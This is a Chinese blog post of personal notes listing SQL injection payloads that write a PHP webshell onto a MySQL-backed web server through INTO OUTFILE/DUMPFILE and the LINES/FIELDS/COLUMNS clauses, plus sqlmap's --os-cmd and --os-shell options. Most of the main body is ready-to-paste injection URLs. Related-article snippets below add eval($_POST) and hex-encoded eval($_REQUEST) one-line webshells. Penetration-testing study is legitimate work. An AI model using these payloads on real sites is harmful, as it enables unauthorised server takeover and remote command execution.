搬砖笔记-SQL注入手写shell的语句

最新推荐文章于 2024-07-11 22:08:09 发布
最新推荐文章于 2024-07-11 22:08:09 发布
阅读量2.5k 收藏 5
点赞数 1
分类专栏: Web安全 SQL注入 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WM_NNXX/article/details/108224750
版权

SQL注入写shell的几种语句

需要绝对路径和权限。
union select 后写入
lines terminated by 写入
lines starting by 写入
fields terminated by 写入
COLUMNS terminated by 写入

union select 后写入

最常见的写入方式,union select 后跟 into outfile 语句

http://1.1.1.1/x/x.php?id=1 union select 1,2,3,4,’<?php phpinfo() ?>’ into outfile ‘C:/wamp64/www/work/webshell.php’

http://1.1.1.1/x/x.php?id=1 union select 1,2,3,4,’<?php phpinfo() ?>’ into dumpfile ‘C:/wamp64/www/work/webshell.php’

PS: 在windows下,位置的分隔符为 /(斜杠)。

lines terminated by 写入

注入点语句

http://1.1.1.1/x/x.php?id=1 into outfile ‘C:/wamp64/www/work/webshell.php’ lines terminated by ‘<?php phpinfo() ?>’;

http://1.1.1.1/x/x.php?id=1 limit 1 into outfile ‘C:/wamp64/www/work/webshell.php’ lines terminated by ‘<?php phpinfo() ?>’;

lines starting by 写入

注入点语句

http://1.1.1.1/x/x.php?id=1 into outfile ‘C:/wamp64/www/work/webshell.php’ lines starting by ‘<?php phpinfo() ?>’;

http://1.1.1.1/x/x.php?id=1 limit 1 into outfile ‘C:/wamp64/www/work/webshell.php’ lines starting by ‘<?php phpinfo() ?>’;

注入原理

利用 lines starting by 语句拼接webshell的内容。lines starting by 可以理解为 以每行开始的位置添加 xx 内容。

fields terminated by 写入

注入点语句

http://1.1.1.1/x/x.php?id=1 into outfile ‘C:/wamp64/www/work/webshell.php’ fields terminated by ‘<?php phpinfo() ?>’;

http://1.1.1.1/x/x.php?id=1 limit 1 into outfile ‘C:/wamp64/www/work/webshell.php’ fields terminated by ‘<?php phpinfo() ?>’;

注入原理

利用 fields terminated by 语句拼接webshell的内容。fields terminated by 可以理解为 以每个字段的位置添加 xx 内容。

COLUMNS terminated by 写入

注入点语句

http://1.1.1.1/x/x.php?id=1 into outfile ‘C:/wamp64/www/work/webshell.php’ COLUMNS terminated by ‘<?php phpinfo() ?>’;

http://1.1.1.1/x/x.php?id=1 limit 1 into outfile ‘C:/wamp64/www/work/webshell.php’ COLUMNS terminated by ‘<?php phpinfo() ?>’;

注入原理

利用 fields terminated by 语句拼接webshell的内容。fields terminated by 可以理解为 以每个字段的位置添加 xx 内容。

sqlmap写shell

前提都是需要对目标目录具有写权限。
–os-cmd=“net user”

交互式命令执行,注意在使用交互式方式时需要知道网站的绝对路径,执行成功之后在绝对路径

下创建文件返回结果,然后再自动删除。
–os-shell

写webshell,会生成两个文件,tmpbshrd.php和tmpucnll.php,分别为命令执行和文件上传webshell。

注意:关闭sqlmap文件就会被删除。

参考:https://manning23.github.io/2019/07/23/MYSQL%E5%AD%98%E5%9C%A8%E6%B3%A8%E5%85%A5%E7%82%B9%EF%BC%8C%E5%86%99WebShell%E7%9A%845%E7%A7%8D%E6%96%B9%E5%BC%8F/

sqlshell原理_sql注入shell的条件
2301_77033340的博客
04-12 623
本篇文章属于自己验证,如有错误之处,请大佬指正。如需转载请注明本次验证涉及的工具有:1 Sqlmap 版本为1.7.22 Phpstudy 版本为8.1.1.3(Apache+Php(5.4)+Mysql(5.7))3 Burpsuite 2021专业版5 Navicat6 中国蚁剑7 靶场环境为Pikachu工具都是常见工具,如需要请网上自行下载1. 知晓网站的绝对路径原因是因为在指定--os-shell参数时,期间会让你输入要入木马的web路径,不然蚁剑如何连接。
【学习笔记】MongoDB
辣辣的博客
11-14 526
【学习笔记】mongoDB1.MongoDB介绍 1.MongoDB介绍 MongoDB是一个基于分布式文件存储的数据库。由C++语言编。旨在为WEB应用提供可扩展的高性能数据存储解决方案。 MongoDB是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。它支持的数据结构非常松散,是类似json的bson格式,因此可以存储比较复杂的数据类型。Mongo最大的特点是它支持的查询语言非常强大,其语法有点类似于面向对象的查询语言,几乎可以实现类似关系数据库单表查询的绝
sql注入shell
weixin_51646864的博客
04-23 6829
靶场练习一下sql注入shell方式
sql注入之getshell方式
最新发布
m0_52484587的博客
07-11 1210
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
SQL注入shell权限
CP1024的博客
01-21 3501
SQL注入shell权限 需要的条件 1. root权限 2. 知道网站的物理绝对路径 3. load_file() 开启 即 secure_file_priv 无限制 可以通过select @@secure_file_priv;查询 (1):如果为NULL,则不能入 (2):如果为空,可以在任意文件位置下入 (3):如果为一个路径,可以在该文件路径入 4. 有入权限 联合入 ?id=1 UNION ALL SELECT 1,'<?php phpinfo();?>',3 into
sql注入shell
jingxiaoxiong459的博客
08-01 373
id=-1' union select 1,2,0x3c3f706870206576616c2840245f524551554553545b785d293b3f203e into outfile 'D:\\phpstu\\phpstudy_pro\\WWW\\shell.php' --+ 尝试将一句话木马shell.php放入网站根目录。1.先将mysql.ini配置文件添加secure_file_priv = '',让secure_file_priv 不表示任何值。3.准备一句话木马<?
SQL注入GetShell的方法(1)
forinput的博客
05-06 4111
SQL注入getshell的五中方式
2024年大数据最全大数据进阶之路——Spark SQL小结_spark sql进阶(2),腾讯大数据开发面试必问
2401_84166567的博客
05-05 735
Standalone 模式的部署比较繁琐,不过官方有提供部署脚本,需要把 Spark 的部署包安装到每一台节点机器上,并且部署的目录也必须相同,而且需要 Master 节点和其他节点实现 SSH 无密码登录。启动时,需要先启动 Spark 的 Master 和 Slave 节点。Spark 的 Job 来源于用户执行 action 操作(这是 Spark 中实际意义的 Job),就是从 RDD 中获取结果的操作,而不是将一个 RDD 转换成另一个 RDD 的 transformation 操作。
程序员编程笔记
weixin_40789007的博客
09-20 4561
1.查看电脑当前进程和端口cmd netstat -pid netstat -a 查看全部端口信息:netstat –ano 2.创建文件夹 mkdir 文件名或文件路径 3.删除文件夹 rmdir 4.删除文件 del 5.打开计算机calc 6.打开画图mspaint 7.用echo "入新数据">d:\a.txt,echo 字符串 >文件路径 文件名(会覆盖原内容) 8.用echo "入新数据">>d:\a.txt,echo 字符串 >文件路径 文件名.
尚硅谷 SpringCloud 第二季学习笔记【已完结】
m0_54850467的博客
06-22 1746
https://spring.io/projects/spring-cloud#overview更详细的版本对应查看方法:https://start.spring.io/actuator/info题外话:boot版已经到2.2.4为最新,为什么选2.2.2? SpringCloud和SpringBoot版本对应关系以前:现在(2020年):约定 > 配置 > 编码 如果有依赖下载不下来就先把 pom 文件中的 注释掉,等下载完成后在取消注释即可Maven中的DependencyManagement和De
笔记,后期整理
weixin_30278237的博客
08-06 8278
VM 虚拟各种系统的工具 安装目录 不要放在C盘 需要下载的镜像Windows NT win7 xp server08R2 server12类Nnix centos 6/7/8 ubuntu 14/16/18 kali安装 win7 1g=1024M1M=1024KB1KB=1024bit1bit 是一个字节 一个字节就是8位由0或者1组成(二进制) 10 进制0-9组成的数字...
sql注入getshell的几种方式
热门推荐
内心不种满鲜花就会长满杂草
04-29 2万+
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
42、利用sql语句shell
weixin_41489908的博客
02-12 1824
目标ip:192.168.52.143 一、御剑扫描该地址 获取到重要信息: 1、网站的绝对路径 2、phpmyadmin,并且是默认账号密码:root 二、登录数据口后台,入一句话木马 select ‘<?php eval($_POST[x]);?>’ into outfile ‘c:/phpstudy/www/xx.php’ 执行的时候报错 解决方法: 1、设置slow_...
sql注入怎么使用linux命令,SQL注入shell不成功后
weixin_36397104的博客
05-16 421
8种机械键盘轴体对比本人程序员,要买一个代码的键盘,请问红轴和茶轴怎么选?之前遇到sql注入,且是root权限后,很容易直接进去shell。现在的Mysql数据库的安全性也高了,即使注入得到mysql的root权限,有时候还是不进去shell。SQL 注入 shellhttp://127.0.0.1:8000/waf/test.php?id=-1' union select 1,2,3 ...
SQL注入】从注入到获取服务器shell,记一次完整的SQL注入攻击过程
kkza的博客
10-28 2197
注入 以pikachu为例,首先发现一个数据查询的点,对其进行手工验证 易知存在SQL注入 shell 通过mysql入文件需满足 连接数据库是root用户 my.ini配置文件需明确secure_file_priv="目录",参考:MySQL读文件 ...
WEBSHELL姿势之SQL一句话
forbidd3n,keep going
10-26 6067
之前的两篇WEBSHELL姿势谈到了两种拿SHELL的方法(上传+解析漏洞、http-put/move方法),当然有时最简单的时候就是上传无限制,或者通过改filename后缀实现。这次我们要实验的就是通过MYSQL来实现。 一般来说要利用MYSQL来实现一句话,有如下几种情况: 1.存在sql注入,在没有字符处理时可直接入一句话(如Select '' into outfile 'F:/ww
记一次“有手就行”的从SQL注入到文件上传Getshell的简单过程
gaotlantis的博客
06-04 793
要多做尝试不要气馁。。。。文章转自:https://juejin.cn/post/7375928754148016155。
渗透测试|sql注入Getshell的几种方式
jennycisp的博客
11-03 1748
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用–os-shell
T-SQL与SQL Server数据库深度学习笔记
"Tsql和sqlserver数据库知识笔记" 在学习T-SQL和SQL Server数据库时,掌握以下几个关键知识点至关重要: 1. **数据库分离与管理**: - 用户数据库与系统数据库的分离是为了确保系统的稳定性和安全性,用户数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值